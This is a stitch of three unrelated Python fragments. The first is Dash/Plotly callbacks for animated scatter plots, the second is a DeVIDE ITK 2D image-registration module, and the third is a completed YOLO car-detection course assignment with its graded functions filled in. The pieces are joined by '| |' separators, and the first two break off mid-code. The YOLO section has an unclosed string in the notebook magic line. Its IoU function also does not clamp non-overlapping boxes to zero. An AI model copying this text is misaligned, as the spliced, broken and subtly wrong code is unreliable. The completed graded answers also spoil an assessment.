options = [{'label': i, 'value': i} for i in dff.columns]
return options
# POPULATE GRAPH 3VAR ENV ANIM
@app.callback(Output('my-3D-graph', 'figure'),
[Input('xaxis-anim-3D', 'value'),
Input('yaxis-anim-3D', 'value'),
Input('caxis-anim-3D', 'value'),
Input('colorbar-slider', 'value'),
Input('anim-frame-3Var', 'value')],
[State('csv-data', 'data')])
def update_figure_3Var(x, y, color, color_value, frame, data):
if not data or not color_value:
return dash.no_update
df = pd.read_json(data, orient='split')
color_val_float = []
for i in range(0, len(color_value), 1):
color_val_float.append(float(color_value[i]))
color_val = color_val_float
return px.scatter(df.sort_values(by=[frame]),
x=x,
y=y,
title="",
animation_frame=frame,
animation_group=df.columns[0],
hover_name=df.columns[0],
hover_data={},
template="none",
color=df[color],
color_continuous_scale='Viridis',
range_color=color_val
).update_xaxes(showgrid=False, title_standoff=10,
title=x.translate(SUP),
autorange=True,
ticks='outside',
showline=True,
showspikes=True,
spikethickness=1,
spikedash='solid',
mirror=True,
tickformat=".1f").update_yaxes(spikedash='solid', title_standoff=10,
showgrid=False,
title=dict(text=y.translate(SUP)
, standoff=5),
autorange=True,
ticks='outside',
showspikes=True,
spikethickness=1,
showline=True,
mirror=True,
tickformat=".1f").update_layout(
clickmode='event+select',
hovermode='closest',
margin={'l': 80},
autosize=True,
font=dict(family='Helvetica', ),
coloraxis_colorbar=dict(title=dict(text=color.translate(SUP), side='right'), ypad=0),
).update_traces(marker=dict(size=10,
opacity=0.7,
showscale=False,
line=dict(width=0.7, color='DarkSlateGrey'),
colorscale="Viridis"))
# POPULATE AXIS DROPDOWN 4VAR ENV ANIM
@app.callback([Output('xaxis-anim', 'options'),
Output('yaxis-anim', 'options'),
Output('caxis-anim', 'options'),
Output('saxis-anim', 'options')
],
[Input('csv-data', 'data')])
def populate_dropdown_4var_anim(data):
if not data:
return dash.no_update, dash.no_update, dash.no_update, dash.no_update
df = pd.read_json(data, orient='split')
options = [{'label': i, 'value': i} for i in df.columns]
return options, options, options, options
# SIZE MODAL CALLBACK 4VAR ENV ANIM
@app.callback(
Output('modal-4Var', 'is_open'),
[Input('saxis-anim', 'value'),
Input('data-table-upload', 'contents'),
Input('close', 'n_clicks')],
[State('data-table-upload', 'filename')])
def update_output_4Var(size_value, contents, modal_close, filename):
ctx = dash.callback_context
user_clicked = ctx.triggered[0]['prop_id'].split('.')[0]
df = parse_contents(contents, filename)
size_list = df[size_value].to_list()
if not user_clicked or user_clicked == 'close':
return dash.no_update, False
if contents is None:
return [], False
if filename is None:
return [], False
if size_value is None:
return [], False
for item in size_list:
if any(c.isalpha() for c in item):
return [], True
# POPULATE COLORBAR SLIDER SCATTER 4VAR ENV ANIM
@app.callback([Output('colorbar-slider-4D', 'min'),
Output('colorbar-slider-4D', 'max'),
Output('colorbar-slider-4D', 'step'),
Output('colorbar-slider-4D', 'value')
],
[Input('csv-data', 'data'),
Input('caxis-anim', 'value')
],
[State('csv-data', 'data')])
def populate_pressure_slider_4Var(_, color, data):
if not data or not color:
return dash.no_update, dash.no_update, dash.no_update, dash.no_update
df = pd.read_json(data, orient='split')
min_v = round(float(df[color].min()), 1)
max_v = round(float(df[color].max()), 1)
step = 0.1
value = [round(float(df[color].min()), 1), round(float(df[color].max()), 1)]
return min_v, max_v, step, value
@app.callback(
Output('slider-output-container-4D', 'children'),
[Input('colorbar-slider-4D', 'value')])
def update_output_4Var(value):
return 'You have selected "{}"'.format(value)
# SIZE RANGE
@app.callback(
Output('size-container-4D', 'children'),
[Input('saxis-anim', 'value'),
Input('csv-data', 'data')],
[State('csv-data', 'data')]
)
def update_output_size_range_4Var(size, __, data):
if not data or not size:
return dash.no_update
df = pd.read_json(data, orient='split')
size_range = [round(df[size].min(), 2), round(df[size].max(), 2)]
return 'Size range: {}'.format(size_range)
# POPULATE GRAPH 4VAR ENV ANIM FRAME
@app.callback(
Output('anim-frame-4Var', 'options'),
[Input('csv-data', 'data')]
)
def populate_animation_frame_4var(data):
if not data:
return dash.no_update
df = pd.read_json(data, orient='split')
dff = df.select_dtypes(exclude=['object'])
options = [{'label': i, 'value': i} for i in dff.columns]
return options
# POPULATE GRAPH 4VAR ENV ANIM
@app.callback(Output('my-graph', 'figure'),
[
Input('xaxis-anim', 'value'),
Input('yaxis-anim', 'value'),
Input('caxis-anim', 'value'),
Input('saxis-anim', 'value'),
Input('colorbar-slider-4D', 'value'),
Input('anim-frame-4Var', 'value')],
[State('csv-data', 'data')]
)
def update_figure_4Var(x, y, color, size, color_value, frame, data):
if not data or not color_value:
return dash.no_update
df = pd.read_json(data, orient='split')
# size_range = [df[size].min(), df[size].max()]
color_val_float = []
for i in range(0, len(color_value), 1):
color_val_float.append(float(color_value[i]))
color_val = color_val_float
return px.scatter(df.sort_values(by=[frame]), x=x, y=y, title="", animation_frame=frame,
animation_group=df.columns[0], size=size, color=color,
hover_name=df.columns[0],
color_continuous_scale='Viridis',
hover_data={}, template="none", range_color=color_val
).update_xaxes(showgrid=False, title=x.translate(SUP), autorange=True, ticks='outside',
showline=True, showspikes=True, spikethickness=1, spikedash='solid',
title_standoff=10,
mirror=True, tickformat=".1f").update_yaxes(spikedash='solid',
showgrid=False, title_standoff=10,
title=dict(text=y.translate(SUP),
standoff=5),
autorange=True, ticks='outside',
showspikes=True, spikethickness=1,
showline=True, mirror=True,
tickformat=".1f").update_layout(
clickmode='event+select', hovermode='closest', margin={'l': 80}, autosize=True, font=dict(family='Helvetica'),
coloraxis_colorbar=dict(title=dict(text=color.translate(SUP), side='right', font=dict(size=14)), ypad=0),
# annotations=[
# dict(x=1.5, y=-0.15, showarrow=False, align='left',
# text='Size range: {}'.format(size_range), xref='paper', yref='paper', font=dict(size=14))
# ]
).update_traces(marker=dict(opacity=0.7, showscale=False, line=dict(width=0.5, color='DarkSlateGrey'),
))
# POPULATE AXIS DROPDOWN 5VAR (3D) ENV ANIM
@app.callback([Output('xaxis-3D', 'options'),
Output('yaxis-3D', 'options'),
Output('zaxis-3D', 'options'),
Output('saxis-3D', 'options'),
Output('caxis-3D', 'options')
],
[Input('csv-data', 'data')], )
def populate_dropdown_5D_anim(data):
if not data:
return dash.no_update, dash.no_update, dash.no_update, dash.no_update, dash.no_update
df = pd.read_json(data, orient='split')
options = [{'label': i, 'value': i} for i in df.columns]
return options, options, options, options, options
# SIZE MODAL CALLBACK 5VAR (3D) ENV ANIM
@app.callback(
Output('modal-5Var', 'is_open'),
[Input('saxis-3D', 'value'),
Input('data-table-upload', 'contents'),
Input('close-5D', 'n_clicks')],
[State('data-table-upload', 'filename')])
def update_output_modal5(size_value, contents, modal_close, filename):
ctx = dash.callback_context
user_clicked = ctx.triggered[0]['prop_id'].split('.')[0]
df = parse_contents(contents, filename)
size_list = df[size_value].to_list()
if not user_clicked or user_clicked == 'close':
return dash.no_update, False
if contents is None:
return [], False
if filename is None:
return [], False
if size_value is None:
return [], False
for item in size_list:
if any(c.isalpha() for c in item):
return [], True
# POPULATE COLORBAR SLIDER SCATTER 5VAR (3D) ENV ANIM
@app.callback([Output('colorbar-slider-5D', 'min'),
Output('colorbar-slider-5D', 'max'),
Output('colorbar-slider-5D', 'step'),
Output('colorbar-slider-5D', 'value')
],
[Input('csv-data', 'data'),
Input('caxis-3D', 'value')
],
[State('csv-data', 'data')])
def populate_pressure_slider_5D(_, color, data):
if not data or not color:
return dash.no_update, dash.no_update, dash.no_update, dash.no_update
df = pd.read_json(data, orient='split')
min_v = round(float(df[color].min()), 1)
max_v = round(float(df[color].max()), 1)
step = 0.1
value = [round(float(df[color].min()), 1), round(float(df[color].max()), 1)]
return min_v, max_v, step, value
@app.callback(
Output('slider-output-container-5D', 'children'),
[Input('colorbar-slider-5D', 'value')])
def update_output_colorbar_5D(value):
return 'You have selected "{}"'.format(value)
# SIZE RANGE
@app.callback(
Output('size-slider-container-5D', 'children'),
[Input('saxis-3D', 'value'),
Input('csv-data', 'data')],
[State('csv-data', 'data')]
)
def update_output_size_range_5D(size, __, data):
if not data or not size:
return dash.no_update
df = pd.read_json(data, orient='split')
size_range = [round(df[size].min(), 2), round(df[size].max(), 2)]
return 'Size range: {}'.format(size_range)
@app.callback(
Output('anim-frame-5D', 'options'),
[Input('csv-data', 'data')]
)
def populate_animation_frame_5D(data):
if not data:
return dash.no_update
df = pd.read_json(data, orient='split')
dff = df.select_dtypes(exclude=['object'])
options = [{'label': i, 'value': i} for i in dff.columns]
return options
# POPULATE GRAPH 5VAR (3D) ENV ANIM
@app.callback(Output("graph", "figure"),
[Input('xaxis-3D', "value"),
Input('yaxis-3D', 'value'),
Input('zaxis-3D', 'value'),
Input('caxis-3D', 'value'),
Input('saxis-3D', 'value'),
Input('colorbar-slider-5D', 'value'),
Input('anim-frame-5D', 'value')],
[State('csv-data', 'data')]
)
def make_figure(x, y, z, color, size, color_value, frame, data):
if not data or not color_value:
return dash.no_update
if x and y and z and color and size is None:
return dash.no_update
df = pd.read_json(data, orient='split')
color_val_float = []
for i in range(0, len(color_value), 1):
color_val_float.append(float(color_value[i]))
color_val = color_val_float
return px.scatter_3d(df.sort_values(by=[frame]), x=x, y=y, z=z, title="", animation_frame=frame,
animation_group=df.columns[0], size=size, color=color,
hover_name=df.columns[0],
color_continuous_scale='Viridis',
hover_data={}, template="none", range_color=color_val
).update_xaxes(showgrid=False, title=x.translate(SUP), autorange=True, tickformat=".1f"
).update_yaxes(
showgrid=False, title=y.translate(SUP), autorange=True, tickformat=".1f").update_layout(
coloraxis_colorbar=dict(title=dict(text=color.translate(SUP), side='right', font=dict(size=14)), ypad=0),
font=dict(family='Helvetica'),
clickmode='event+select', hovermode='closest', margin={'l': 50, 'b': 80, 't': 50, 'r': 10}, autosize=True,
).update_traces(
marker=dict(opacity=0.7, showscale=False, line=dict(width=0.5, color='#3d3d3d'),
))
# POPULATE AXIS DROPDOWN SCATTER DATA TABLE FIGURE
@app.callback([Output('xaxis', 'options'),
Output('yaxis', 'options'),
Output('caxis', 'options'),
Output('saxis', 'options')
],
[Input('csv-data', 'data')], )
def populate_scatter_dropdown(data):
if not data:
return dash.no_update, dash.no_update, dash.no_update, dash.no_update
df = pd.read_json(data, orient='split')
options = [{'label': i, 'value': i} for i in df.columns]
return options, options, options, options
# SIZE MODAL CALLBACK SCATTER DATA TABLE
@app.callback(
Output('modal-data', 'is_open'),
[Input('saxis', 'value'),
Input('data-table-upload', 'contents'),
Input('close-data', 'n_clicks')],
[State('data-table-upload', 'filename')])
def update_output(size_value, contents, modal_close, filename):
ctx = dash.callback_context
user_clicked = ctx.triggered[0]['prop_id'].split('.')[0]
df = parse_contents(contents, filename)
size_list = df[size_value].to_list()
if not user_clicked or user_clicked == 'close':
return dash.no_update, False
if contents is None:
return [], False
if filename is None:
return [], False
if size_value is None:
return [], False
for item in size_list:
if any(c.isalpha() for c in item):
return [], True
# COLOR MODAL CALLBACK SCATTER DATA TABLE
@app.callback(
Output('modal-datac', 'is_open'),
[Input('caxis', 'value'),
Input('data-table-upload', 'contents'),
Input('close-datac', 'n_clicks')],
[State('data-table-upload', 'filename')])
def update_output(color_value, contents, modal_close, filename):
ctx = dash.callback_context
user_clicked = ctx.triggered[0]['prop_id'].split('.')[0]
df = parse_contents(contents, filename)
color_list = df[color_value].to_list()
if not user_clicked or user_clicked == 'close':
return dash.no_update, False
if contents is None:
return [], False
if filename is None:
return [], False
if color_value is None:
return [], False
for item in color_list:
if any(c.isalpha() for c in item):
return [], True
# POPULATE DATA TABLE SCATTER
@app.callback([Output('data-table-interact', 'data'),
Output('data-table-interact', 'columns')],
[Input('data-table-upload', 'contents')],
[State('data-table-upload', 'filename')])
def update_output(contents, filename):
if contents is None:
return [{}], | |
# Copyright (c) <NAME>, TU Delft
# All rights reserved.
# See COPYRIGHT for details.
# TODO:
# * if the input imageStackRDR is reconfigured to read a different stack
# by the user, then things will break. We probably have to add an observer
# and adapt to the new situation.
# * ditto for the input transformStackRDR
# * an observer which internally disconnects in the case of a screwup would
# be good enough; the user can be warned that he should reconnect
import gen_utils
from typeModules.imageStackClass import imageStackClass
from typeModules.transformStackClass import transformStackClass
from module_base import ModuleBase
import module_utils
import operator
import fixitk as itk
import ConnectVTKITKPython as CVIPy
import vtk
import wx
class register2D(ModuleBase):
"""Registers a stack of 2D images and generates a list of transforms.
This is BAD-ASSED CODE(tm) and can crash the whole of DeVIDE without
even saying sorry afterwards. You have been warned.
"""
def __init__(self, module_manager):
ModuleBase.__init__(self, module_manager)
self._createLogic()
self._createViewFrames()
self._bindEvents()
# FIXME: add current transforms to config stuff
def close(self):
# we do this just in case...
self.set_input(0, None)
self.set_input(1, None)
ModuleBase.close(self)
# take care of the IPWs
self._destroyIPWs()
# take care of pipeline thingies
del self._rescaler1
del self._itkExporter1
del self._vtkImporter1
del self._resampler2
del self._rescaler2
del self._itkExporter2
del self._vtkImporter2
# also take care of our output!
del self._transformStack
# nasty trick to take care of RenderWindow
self._threedRenderer.RemoveAllProps()
del self._threedRenderer
self.viewerFrame.threedRWI.GetRenderWindow().WindowRemap()
self.viewerFrame.Destroy()
del self.viewerFrame
# then do the controlFrame
self.controlFrame.Destroy()
del self.controlFrame
def get_input_descriptions(self):
return ('ITK Image Stack', '2D Transform Stack')
def set_input(self, idx, inputStream):
if idx == 0:
if inputStream != self._imageStack:
# if it's None, we have to take it
if inputStream == None:
# disconnect
del self._transformStack[:]
self._destroyIPWs()
self._imageStack = None
self._pairNumber = -1
return
# let's setup for a new stack!
try:
assert(inputStream.__class__.__name__ == 'imageStackClass')
inputStream.Update()
assert(len(inputStream) >= 2)
except Exception:
# if the Update call doesn't work or
# if the input list is not long enough (or unsizable),
# we don't do anything
raise TypeError, \
"register2D requires an ITK Image Stack of minimum length 2 as input."
# now check that the imageStack is the same size as the
# transformStack
if self._inputTransformStack and \
len(inputStream) != len(self._inputTransformStack):
raise TypeError, \
"The Image Stack you are trying to connect has a\n" \
"different length than the connected Transform\n" \
"Stack."
self._imageStack = inputStream
if self._inputTransformStack:
self._copyInputTransformStack()
else:
# create a new transformStack
del self._transformStack[:]
# the first transform is always identity
for dummy in self._imageStack:
self._transformStack.append(
itk.itkEuler2DTransform_New())
self._transformStack[-1].SetIdentity()
self._showImagePair(1)
else: # closes if idx == 0 block
if inputStream != self._inputTransformStack:
if inputStream == None:
# we disconnect, but we keep the transforms we have
self._inputTransformStack = None
return
try:
assert(inputStream.__class__.__name__ == \
'transformStackClass')
except Exception:
raise TypeError, \
"register2D requires an ITK Transform Stack on " \
"this port."
inputStream.Update()
if len(inputStream) < 2:
raise TypeError, \
"The input transform stack should be of minimum " \
"length 2."
if self._imageStack and \
len(inputStream) != len(self._imageStack):
raise TypeError, \
"The Transform Stack you are trying to connect\n" \
"has a different length than the connected\n" \
"Transform Stack"
self._inputTransformStack = inputStream
if self._imageStack:
self._copyInputTransformStack()
self._showImagePair(self._pairNumber)
def get_output_descriptions(self):
return ('2D Transform Stack',)
def get_output(self, idx):
return self._transformStack
def execute_module(self):
pass
def view(self, parent_window=None):
# if the window is already visible, raise it
if not self.viewerFrame.Show(True):
self.viewerFrame.Raise()
if not self.controlFrame.Show(True):
self.controlFrame.Raise()
# ----------------------------------------------------------------------
# non-API methods start here -------------------------------------------
# ----------------------------------------------------------------------
def _bindEvents(self):
wx.EVT_BUTTON(self.viewerFrame, self.viewerFrame.showControlsButtonId,
self._handlerShowControls)
wx.EVT_BUTTON(self.viewerFrame, self.viewerFrame.resetCameraButtonId,
lambda e: self._resetCamera())
wx.EVT_SPINCTRL(self.controlFrame,
self.controlFrame.pairNumberSpinCtrlId,
self._handlerPairNumberSpinCtrl)
wx.EVT_BUTTON(self.controlFrame, self.controlFrame.transformButtonId,
self._handlerTransformButton)
wx.EVT_BUTTON(self.controlFrame, self.controlFrame.registerButtonId,
self._handlerRegisterButton)
def _copyInputTransformStack(self):
"""Copy the contents of the inputTransformStack to the internal
transform stack.
"""
# take care of the current ones
del self._transformStack[:]
# then copy
for trfm in self._inputTransformStack:
# FIXME: do we need to take out a ref?
self._transformStack.append(trfm)
def _createLogic(self):
# input
self._imageStack = None
# optional input
self._inputTransformStack = None
# output is a transform stack
self._transformStack = transformStackClass(self)
self._ipw1 = None
self._ipw2 = None
# some control variables
self._pairNumber = -1
# we need to have two converters from itk::Image to vtkImageData,
# hmmmm kay?
self._transform1 = itk.itkEuler2DTransform_New()
self._transform1.SetIdentity()
print self._transform1.GetParameters()
self._rescaler1 = itk.itkRescaleIntensityImageFilterF2F2_New()
self._rescaler1.SetOutputMinimum(0)
self._rescaler1.SetOutputMaximum(255)
self._itkExporter1 = itk.itkVTKImageExportF2_New()
self._itkExporter1.SetInput(self._rescaler1.GetOutput())
self._vtkImporter1 = vtk.vtkImageImport()
CVIPy.ConnectITKF2ToVTK(self._itkExporter1.GetPointer(),
self._vtkImporter1)
self._resampler2 = None
self._rescaler2 = itk.itkRescaleIntensityImageFilterF2F2_New()
self._rescaler2.SetOutputMinimum(0)
self._rescaler2.SetOutputMaximum(255)
self._itkExporter2 = itk.itkVTKImageExportF2_New()
self._itkExporter2.SetInput(self._rescaler2.GetOutput())
self._vtkImporter2 = vtk.vtkImageImport()
CVIPy.ConnectITKF2ToVTK(self._itkExporter2.GetPointer(),
self._vtkImporter2)
def _createViewFrames(self):
import modules.Insight.resources.python.register2DViewFrames
reload(modules.Insight.resources.python.register2DViewFrames)
viewerFrame = modules.Insight.resources.python.register2DViewFrames.\
viewerFrame
self.viewerFrame = module_utils.instantiate_module_view_frame(
self, self._module_manager, viewerFrame)
self._threedRenderer = vtk.vtkRenderer()
self._threedRenderer.SetBackground(0.5, 0.5, 0.5)
self.viewerFrame.threedRWI.GetRenderWindow().AddRenderer(
self._threedRenderer)
istyle = vtk.vtkInteractorStyleImage()
self.viewerFrame.threedRWI.SetInteractorStyle(istyle)
# controlFrame creation
controlFrame = modules.Insight.resources.python.\
register2DViewFrames.controlFrame
self.controlFrame = module_utils.instantiate_module_view_frame(
self, self._module_manager, controlFrame)
# display
self.viewerFrame.Show(True)
self.controlFrame.Show(True)
def _createIPWs(self):
self._ipw1 = vtk.vtkImagePlaneWidget()
self._ipw2 = vtk.vtkImagePlaneWidget()
for ipw, vtkImporter in ((self._ipw1, self._vtkImporter1),
(self._ipw2, self._vtkImporter2)):
vtkImporter.Update()
ipw.SetInput(vtkImporter.GetOutput())
ipw.SetPlaneOrientation(2)
ipw.SetInteractor(self.viewerFrame.threedRWI)
ipw.On()
ipw.InteractionOff()
self._setModeRedGreen()
def _destroyIPWs(self):
"""If the two IPWs exist, remove them completely and remove all
bindings that we have.
"""
for ipw in (self._ipw1, self._ipw2):
if ipw:
# switch off
ipw.Off()
# disconnect from interactor
ipw.SetInteractor(None)
# disconnect from its input
ipw.SetInput(None)
self._ipw1 = None
self._ipw2 = None
def _handlerPairNumberSpinCtrl(self, event):
self._showImagePair(self.controlFrame.pairNumberSpinCtrl.GetValue())
def _handlerRegisterButton(self, event):
maxIterations = gen_utils.textToFloat(
self.controlFrame.maxIterationsTextCtrl.GetValue(), 50)
if not maxIterations > 0:
maxIterations = 50
self._registerCurrentPair(maxIterations)
self.controlFrame.maxIterationsTextCtrl.SetValue(str(maxIterations))
def _handlerShowControls(self, event):
# make sure the window is visible and raised
self.controlFrame.Show(True)
self.controlFrame.Raise()
def _handlerTransformButton(self, event):
# take xtranslate, ytranslate, rotate and work it into the current
# transform (if that exists)
if self._pairNumber > 0:
pda = self._transformStack[self._pairNumber].GetParameters()
rot = gen_utils.textToFloat(
self.controlFrame.rotationTextCtrl.GetValue(),
pda.GetElement(0))
xt = gen_utils.textToFloat(
self.controlFrame.xTranslationTextCtrl.GetValue(),
pda.GetElement(1))
yt = gen_utils.textToFloat(
self.controlFrame.yTranslationTextCtrl.GetValue(),
pda.GetElement(2))
pda.SetElement(0, rot)
pda.SetElement(1, xt)
pda.SetElement(2, yt)
self._transformStack[self._pairNumber].SetParameters(pda)
# we have to do this manually
self._transformStack[self._pairNumber].Modified()
self._rescaler2.Update() # give ITK a chance to complain
self.viewerFrame.threedRWI.GetRenderWindow().Render()
def _registerCurrentPair(self, maxIterations):
if not self._pairNumber > 0:
# no data, return
return
currentTransform = self._transformStack[self._pairNumber]
fixedImage = self._imageStack[self._pairNumber - 1]
movingImage = self._imageStack[self._pairNumber]
registration = itk.itkImageRegistrationMethodF2F2_New()
# sum of squared differences
imageMetric = itk.itkMeanSquaresImageToImageMetricF2F2_New()
#imageMetric = itk.itkNormalizedCorrelationImageToImageMetricF2F2_New()
optimizer = itk.itkRegularStepGradientDescentOptimizer_New()
#optimizer = itk.itkConjugateGradientOptimizer_New()
interpolator = itk.itkLinearInterpolateImageFunctionF2D_New()
registration.SetOptimizer(optimizer.GetPointer())
registration.SetTransform(currentTransform.GetPointer() )
registration.SetInterpolator(interpolator.GetPointer())
registration.SetMetric(imageMetric.GetPointer())
registration.SetFixedImage(fixedImage)
registration.SetMovingImage(movingImage)
registration.SetFixedImageRegion(fixedImage.GetBufferedRegion())
initialParameters = currentTransform.GetParameters()
registration.SetInitialTransformParameters( initialParameters )
#
# Define optimizer parameters
#
optimizer.SetMaximumStepLength( 1 )
optimizer.SetMinimumStepLength( 0.01 )
optimizer.SetNumberOfIterations( maxIterations )
# velly impoltant: the scales
# the larger a scale, the smaller the impact of that parameter on
# the calculated gradient
scalesDA = itk.itkArrayD(3)
scalesDA.SetElement(0, 1e-01)
scalesDA.SetElement(1, 1e-05)
scalesDA.SetElement(2, 1e-05)
optimizer.SetScales(scalesDA)
#
# Start the registration process
#
def iterationEvent():
pm = "register2D optimizer value: %f stepsize: %f" % \
(optimizer.GetValue(),
optimizer.GetCurrentStepLength())
p = (optimizer.GetCurrentIteration() + 1) / maxIterations * 100.0
self._module_manager.setProgress(p, pm)
pc2 = itk.itkPyCommand_New()
pc2.SetCommandCallable(iterationEvent)
optimizer.AddObserver(itk.itkIterationEvent(),
pc2.GetPointer())
# FIXME: if this throws an exception, reset transform!
registration.StartRegistration()
fpm = 'register2D registration done (final value: %0.2f).' % \
optimizer.GetValue()
self._module_manager.setProgress(100.0, fpm)
print registration.GetLastTransformParameters().GetElement(0)
print registration.GetLastTransformParameters().GetElement(1)
print registration.GetLastTransformParameters().GetElement(2)
self._syncGUIToCurrentPair()
currentTransform.Modified()
self._rescaler2.Update() # give ITK a chance to complain
self.viewerFrame.threedRWI.GetRenderWindow().Render()
def _resetCamera(self):
"""If an IPW is available (i.e. there's some data), this method
will setup the camera to be nice and orthogonal to the IPW.
"""
if self._ipw1:
# VTK5 vs old-style VTK
try:
planeSource = self._ipw1.GetPolyDataAlgorithm()
except AttributeError:
planeSource = self._ipw1.GetPolyDataSource()
cam = self._threedRenderer.GetActiveCamera()
cam.SetPosition(planeSource.GetCenter()[0],
planeSource.GetCenter()[1], 10)
cam.SetFocalPoint(planeSource.GetCenter())
cam.OrthogonalizeViewUp()
cam.SetViewUp(0,1,0)
cam.SetClippingRange(1, 11)
v2 = map(operator.sub, planeSource.GetPoint2(),
planeSource.GetOrigin())
n2 = vtk.vtkMath.Normalize(v2)
cam.SetParallelScale(n2 / 2.0)
cam.ParallelProjectionOn()
self.viewerFrame.threedRWI.GetRenderWindow().Render()
def _setModeCheckerboard(self):
pass
def _setModeRedGreen(self):
"""Set visualisation mode to RedGreen.
The second image is always green.
"""
#for ipw, col in ((self._ipw1, 0.0), (self._ipw2, 0.3)):
for ipw, col in ((self._ipw2, 0.3),):
inputData = ipw.GetInput()
inputData.Update() # make sure the metadata is up to date
minv, maxv = inputData.GetScalarRange()
lut = vtk.vtkLookupTable()
lut.SetTableRange((minv, maxv))
lut.SetHueRange((col, col)) # keep it green!
lut.SetSaturationRange((1.0, 1.0))
lut.SetValueRange((0.0, 1.0))
lut.SetAlphaRange((0.5, 0.5))
lut.Build()
ipw.SetLookupTable(lut)
def _showImagePair(self, pairNumber):
"""Set everything up to have the user interact with image pair
pairNumber.
pairNumber is 1 based, i.e. pairNumber 1 implies the registration
between image 1 and | |
# # Autonomous driving - Car detection
import argparse
import os
import matplotlib.pyplot as plt
from matplotlib.pyplot import imshow
import scipy.io
import scipy.misc
import numpy as np
import pandas as pd
import PIL
import tensorflow as tf
from keras import backend as K
from keras.layers import Input, Lambda, Conv2D
from keras.models import load_model, Model
from yolo_utils import read_classes, read_anchors, generate_colors, preprocess_image, draw_boxes, scale_boxes
from yad2k.models.keras_yolo import yolo_head, yolo_boxes_to_corners, preprocess_true_boxes, yolo_loss, yolo_body
get_ipython().magic('matplotlib inline
# GRADED FUNCTION: yolo_filter_boxes
def yolo_filter_boxes(box_confidence, boxes, box_class_probs, threshold = .6):
"""Filters YOLO boxes by thresholding on object and class confidence.
Arguments:
box_confidence -- tensor of shape (19, 19, 5, 1)
boxes -- tensor of shape (19, 19, 5, 4)
box_class_probs -- tensor of shape (19, 19, 5, 80)
threshold -- real value, if [ highest class probability score < threshold], then get rid of the corresponding box
Returns:
scores -- tensor of shape (None,), containing the class probability score for selected boxes
boxes -- tensor of shape (None, 4), containing (b_x, b_y, b_h, b_w) coordinates of selected boxes
classes -- tensor of shape (None,), containing the index of the class detected by the selected boxes
Note: "None" is here because you don't know the exact number of selected boxes, as it depends on the threshold.
For example, the actual output size of scores would be (10,) if there are 10 boxes.
"""
# Step 1: Compute box scores
### START CODE HERE ### (≈ 1 line)
box_scores = box_confidence * box_class_probs
### END CODE HERE ###
# Step 2: Find the box_classes thanks to the max box_scores, keep track of the corresponding score
### START CODE HERE ### (≈ 2 lines)
box_classes = K.argmax(box_scores, axis=-1)
box_class_scores = K.max(box_scores, axis=-1, keepdims=False)
### END CODE HERE ###
# Step 3: Create a filtering mask based on "box_class_scores" by using "threshold". The mask should have the
# same dimension as box_class_scores, and be True for the boxes you want to keep (with probability >= threshold)
### START CODE HERE ### (≈ 1 line)
filtering_mask = box_class_scores >= threshold
### END CODE HERE ###
# Step 4: Apply the mask to scores, boxes and classes
### START CODE HERE ### (≈ 3 lines)
scores = tf.boolean_mask(box_class_scores, filtering_mask)
boxes = tf.boolean_mask(boxes, filtering_mask)
classes = tf.boolean_mask(box_classes, filtering_mask)
### END CODE HERE ###
return scores, boxes, classes
# In[15]:
with tf.Session() as test_a:
box_confidence = tf.random_normal([19, 19, 5, 1], mean=1, stddev=4, seed = 1)
boxes = tf.random_normal([19, 19, 5, 4], mean=1, stddev=4, seed = 1)
box_class_probs = tf.random_normal([19, 19, 5, 80], mean=1, stddev=4, seed = 1)
scores, boxes, classes = yolo_filter_boxes(box_confidence, boxes, box_class_probs, threshold = 0.5)
print("scores[2] = " + str(scores[2].eval()))
print("boxes[2] = " + str(boxes[2].eval()))
print("classes[2] = " + str(classes[2].eval()))
print("scores.shape = " + str(scores.shape))
print("boxes.shape = " + str(boxes.shape))
print("classes.shape = " + str(classes.shape))
# GRADED FUNCTION: iou
def iou(box1, box2):
"""Implement the intersection over union (IoU) between box1 and box2
Arguments:
box1 -- first box, list object with coordinates (x1, y1, x2, y2)
box2 -- second box, list object with coordinates (x1, y1, x2, y2)
"""
# Calculate the (y1, x1, y2, x2) coordinates of the intersection of box1 and box2. Calculate its Area.
### START CODE HERE ### (≈ 5 lines)
xi1 = np.max([box1[0], box2[0]])
yi1 = np.max([box1[1], box2[1]])
xi2 = np.min([box1[2], box2[2]])
yi2 = np.min([box1[3], box2[3]])
inter_area = (yi2 - yi1)*(xi2 - xi1)
### END CODE HERE ###
# Calculate the Union area by using Formula: Union(A,B) = A + B - Inter(A,B)
### START CODE HERE ### (≈ 3 lines)
box1_area = (box1[3]-box1[1])*(box1[2]-box1[0])
box2_area = (box2[3]-box2[1])*(box2[2]-box2[0])
union_area = box1_area + box2_area - inter_area
### END CODE HERE ###
# compute the IoU
### START CODE HERE ### (≈ 1 line)
iou = inter_area/union_area
### END CODE HERE ###
return iou
# In[19]:
box1 = (2, 1, 4, 3)
box2 = (1, 2, 3, 4)
print("iou = " + str(iou(box1, box2)))
# GRADED FUNCTION: yolo_non_max_suppression
def yolo_non_max_suppression(scores, boxes, classes, max_boxes = 10, iou_threshold = 0.5):
"""
Applies Non-max suppression (NMS) to set of boxes
Arguments:
scores -- tensor of shape (None,), output of yolo_filter_boxes()
boxes -- tensor of shape (None, 4), output of yolo_filter_boxes() that have been scaled to the image size (see later)
classes -- tensor of shape (None,), output of yolo_filter_boxes()
max_boxes -- integer, maximum number of predicted boxes you'd like
iou_threshold -- real value, "intersection over union" threshold used for NMS filtering
Returns:
scores -- tensor of shape (, None), predicted score for each box
boxes -- tensor of shape (4, None), predicted box coordinates
classes -- tensor of shape (, None), predicted class for each box
Note: The "None" dimension of the output tensors has obviously to be less than max_boxes. Note also that this
function will transpose the shapes of scores, boxes, classes. This is made for convenience.
"""
max_boxes_tensor = K.variable(max_boxes, dtype='int32') # tensor to be used in tf.image.non_max_suppression()
K.get_session().run(tf.variables_initializer([max_boxes_tensor])) # initialize variable max_boxes_tensor
# Use tf.image.non_max_suppression() to get the list of indices corresponding to boxes you keep
### START CODE HERE ### (≈ 1 line)
nms_indices = tf.image.non_max_suppression(boxes, scores, max_boxes, iou_threshold)
### END CODE HERE ###
# Use K.gather() to select only nms_indices from scores, boxes and classes
### START CODE HERE ### (≈ 3 lines)
scores = K.gather(scores, nms_indices)
boxes = K.gather(boxes, nms_indices)
classes = K.gather(classes, nms_indices)
### END CODE HERE ###
return scores, boxes, classes
# In[23]:
with tf.Session() as test_b:
scores = tf.random_normal([54,], mean=1, stddev=4, seed = 1)
boxes = tf.random_normal([54, 4], mean=1, stddev=4, seed = 1)
classes = tf.random_normal([54,], mean=1, stddev=4, seed = 1)
scores, boxes, classes = yolo_non_max_suppression(scores, boxes, classes)
print("scores[2] = " + str(scores[2].eval()))
